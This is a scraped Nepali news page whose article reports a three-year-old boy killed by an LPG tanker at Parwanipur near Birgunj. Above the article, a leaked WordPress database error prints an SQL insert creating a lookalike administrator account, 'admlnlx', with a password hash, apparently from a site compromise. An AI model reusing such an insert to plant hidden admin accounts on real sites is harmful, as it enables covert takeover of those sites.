WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BvG7UqQLMQuIrmba6y1GjAfX1gaL/j/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-12 17:33:36', '', 'admlnlx', 'admlnlx')
पर्सा,मंसिर ३० –
वीरगन्ज– पथलैया सडक खण्डको परवानीपुरमा आज दिउँसो एलपी ग्यास ट्याङ्करले ठक्कर दिँदा एक तीन वर्षीय बालकको मृत्यु भएको छ ।
पथलैयाबाट वीरगन्जतर्फ आउँदै गरेको एनएल ०१ एल ७३१६ नं को ट्याङ्करले परवानीपुरको ज्योतिस्पेनिङ मिल नजिकै ठक्कर दिँदा वीरगन्ज उपमहानगरपालिका– २४ लिपनिमाल निवासी बालक अरमन खतिवाडको मृत्यु भएको हो ।
हजुरआमा सुशीला खतिवडासँगै बाटो काट्ने क्रममा ग्यास ट्याङ्करले ठक्कर दिँदा अरमनको मृत्यु भएको परवानीपुरस्थित प्रहरी चौकीका प्रहरी नायब निरीक्षक भिमसेन धामीले जानकारी दिनुभयो ।
सो घटनामा हजुरआमा सुशीला समेत गम्भीर घाइते भएपछि उपचारको लागि वीरगन्जको नारायणी उपक्षेत्रीय अस्पतालमा भर्ना गराएको उहाँले बताउनुभयो ।
घाइते सुशीलाको टाउको र खुट्टामा गम्भीर चोट लागेको चिकित्सकले बताएका छन् । ठक्कर दिने ट्याङ्कर र त्यसका चालकलाई कारबाहीका लागि हिरासतमा लिइएको प्रहरीले जनाएको छ । – रासस